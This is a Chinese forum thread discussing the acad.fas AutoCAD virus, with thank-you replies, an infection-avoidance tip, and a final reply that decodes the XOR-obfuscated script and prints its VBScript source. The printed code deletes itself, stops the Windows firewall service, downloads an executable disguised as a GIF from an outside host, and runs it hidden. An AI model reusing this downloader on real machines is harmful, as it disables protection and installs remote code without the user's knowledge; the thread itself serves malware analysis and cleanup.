[不死猫出品] acad.fas 病毒原理破解分析和病毒脚本源码

头大无恼 · 发表于 2010-6-15 08:05:00

好贴

zxmmelly · 发表于 2010-7-3 13:57:00

老猫的贴一定要回的

undead · 发表于 2010-7-3 17:18:00

多谢，学习了

edoumxx · 发表于 2010-7-7 23:20:00

这种病毒还会格盘？目前还没碰到

危害太大了，

下了学习一下，谢谢分享了

842986480 · 发表于 2010-9-12 23:57:00

拜倒

461045462 · 发表于 2010-9-14 06:33:00

这种病毒遇上很麻烦，上次遇上请人从windows和注册里面清除，才解决。

谢谢楼主的分享

ldiamond · 发表于 2010-10-11 15:10:00

下载看看，学习一下

pop159 · 发表于 2011-3-8 20:58:48

太强了！

zark · 发表于 2011-3-30 14:14:11

不懂楼主有没有发现
假设一台未中CAD病毒的电脑，拷进1个文件夹后（包含病毒和DWG文件）
用两种方法打开，一种会中毒，一种不会。
1：会中毒
这种方法就是：：：直接打开DWG
2：不会中毒
这种方法是先启动CAD，再打开病毒目录下的DWG。
所以，不懂你的图纸目录下有没有病毒，只要你养成习惯，先启动CAD，再打开图纸，都不会中毒

cabinsummer · 发表于 2011-9-24 10:58:01

本帖最后由 cabinsummer 于 2011-9-24 11:02 编辑

其实这个脚本文件加密不是很复杂，就是每个字符与23异或做成加密

On Error Resume Next
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile WScript.ScriptFullName, True
wscript.sleep 300000
createObject("wscript.shell").Run "cmd.exe /C net stop sharedaccess", 0, True
wscript.sleep 1200000
SavePth = LCase("c:\windows\web\logo.exe")
If objFSO.FileExists (SavePth) Then objFSO.DeleteFile (SavePth) End If
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.cadgs.com/z/logo.gif",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\windows\web\safemodelogo.gif",2
objFSO.MoveFile "c:\windows\web\safemodelogo.gif" , SavePth
If objFSO.GetFile (SavePth).size > 3000 Then CreateObject("Wscript.Shell").run SavePth, 0, true End If
If objFSO.FileExists (SavePth) Then objFSO.DeleteFile (SavePth) End If

复制代码

账号		自动登录	找回密码
密码			注册

[【不死猫】] [不死猫出品] acad.fas 病毒原理破解分析和病毒脚本源码

点评